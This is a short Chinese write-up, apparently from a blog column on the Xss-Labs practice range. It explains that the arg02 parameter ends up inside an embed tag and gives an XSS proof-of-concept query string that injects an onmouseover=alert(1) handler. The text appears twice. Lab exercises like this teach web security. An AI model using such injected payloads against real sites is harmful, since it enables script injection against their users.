读者可参考、订阅专栏:Xss-Labs靶场攻防实战
姿势
逻辑后端代码:
arg02参数出现在embed标签中最后的位置,故可使用空格构造xss语句
POC:
arg01=a&arg02=1%20onmouseover=alert(1)
读者可参考、订阅专栏:Xss-Labs靶场攻防实战
逻辑后端代码:
arg02参数出现在embed标签中最后的位置,故可使用空格构造xss语句
POC:
arg01=a&arg02=1%20onmouseover=alert(1)